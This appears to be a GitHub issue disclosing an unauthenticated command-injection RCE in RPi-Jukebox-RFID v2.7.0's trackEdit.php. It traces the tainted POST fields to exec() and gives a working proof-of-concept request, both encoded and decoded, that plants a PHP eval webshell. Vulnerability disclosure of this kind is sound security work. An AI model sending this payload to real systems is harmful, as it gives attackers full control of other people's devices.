Open xjzzzxx opened 3 months ago
I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:
POST /htdocs/trackEdit.php
Data
ACTION=trackDelete&deleteTrack=yes&folder=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%5c%24_POST%5b%27shell5%27%5d)+%3f%3e%22++%3e+.%2fshell5.php+%3b&filename=1%22
Here is Data without url encoding for ease of understanding:
ACTION=trackDelete&deleteTrack=yes&folder=hello" ; echo "<?php @eval(\$_POST['shell5']) ?>" > ./shell5.php ;&filename=1"
Manual verification
Version
v2.7.0
Branch
released
OS
ubuntu 22
Pi model
unknown
Hardware
No response
What happened?
Hello,
I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(No permissions required)
Analysis
The path of the vulnerability: htdocs\trackEdit.php
Source from Line 235 (
$_POST['folder']
and$_POST['filename']
) .And then there are two check point(Line 232 and Line 233) ,which we should set
$_POST['ACTION'] = trackDelete
and$_POST['deleteTrack'] = yes
to bypass.After bypass two check point, the source(tainted) pass to
$exec
andexec($exec);
(Line 236) without another check.Poc
POST /htdocs/trackEdit.php
Data:
ACTION=trackDelete&deleteTrack=yes&folder=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell5.php+%3b&filename=1%22
Here is the version without url encoding for ease of understanding:
ACTION=trackDelete&deleteTrack=yes&folder=hello" ; echo "<?php @eval($_POST['pass']) ?>" > ./shell5.php ;&filename=1"
Manual verification
The attacker can then easily connect to this webshell(/htdocs/shell5.php)
Logs
No response
Configuration
No response
More info
No response